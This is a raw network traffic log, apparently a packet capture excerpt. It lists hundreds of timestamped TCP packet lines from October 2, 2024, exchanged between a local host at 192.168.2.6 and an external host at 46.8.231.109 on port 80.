                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.286990881 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.286997080 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287012100 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287019968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287029028 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287054062 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287089109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287101030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287111998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287121058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287122011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287134886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287154913 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287826061 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287882090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287892103 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287914991 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287935972 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287961960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287974119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287986040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.287996054 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288012028 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288028955 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288113117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288125992 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288137913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288147926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288149118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288162947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288166046 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288175106 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288186073 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288211107 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288288116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288300037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288332939 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288908005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288954973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288958073 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288966894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.288989067 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289005041 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289036036 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289047956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289060116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289083004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289105892 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289160967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289170980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289190054 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289205074 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289227009 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289329052 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289340019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289350986 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289361954 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289362907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289372921 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289378881 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289395094 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.289418936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.649805069 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.654587030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823347092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823400974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823415041 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823465109 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823487043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823497057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823497057 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823508024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823524952 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823528051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823538065 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823560953 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823586941 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.825025082 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.825037003 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.825058937 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.825068951 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.825078011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.825082064 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.825107098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.825138092 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826113939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826129913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826141119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826152086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826160908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826176882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826188087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826194048 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826198101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826212883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826224089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826225042 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826234102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826241970 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826250076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826258898 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826261997 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826272964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826282978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826283932 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826312065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826328993 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826339960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826349974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826359987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826370001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826401949 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826411963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826416016 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826428890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826432943 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826441050 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826452017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826457024 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826462984 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826472998 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826473951 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826483965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826497078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826500893 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826509953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826515913 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826522112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826533079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826545000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826545000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826555014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826566935 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826566935 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826577902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826582909 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826591015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826600075 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826603889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826622963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826625109 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826652050 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826673985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826685905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826729059 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826769114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826780081 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826790094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826801062 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826859951 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826885939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826917887 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.826993942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827023983 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827425957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827436924 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827447891 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827457905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827475071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827498913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827502966 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827511072 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827521086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827529907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.827565908 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905308008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905328989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905339956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905358076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905366898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905369997 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905379057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905390978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905405045 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905441046 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905787945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905800104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905810118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905833960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905842066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905848026 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905868053 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905868053 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905881882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905910969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.905939102 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906455994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906495094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906503916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906533957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906549931 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906560898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906560898 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906578064 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906584978 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906589985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906599998 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906615019 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906632900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906636953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906646967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906678915 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906718016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906749964 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906754017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906765938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906785011 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906801939 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906821966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906831980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906841993 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906876087 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.906888962 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907517910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907530069 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907540083 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907569885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907593012 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907594919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907607079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907617092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907628059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907639027 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907640934 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907669067 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907686949 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907696962 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907720089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907742023 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907763958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907776117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907788038 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907809019 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907815933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907825947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907831907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907857895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907871008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907881975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907891989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907908916 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.907928944 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908513069 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908591986 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908601046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908632994 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908646107 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908657074 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908658028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908669949 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908685923 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908691883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908704996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908711910 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908737898 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908782005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908792973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908804893 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908814907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908814907 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908840895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908865929 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908893108 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908905029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908915043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908924103 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908934116 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908938885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908948898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908957958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908966064 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.908983946 CEST5851580192.168.2.646.8.231.109
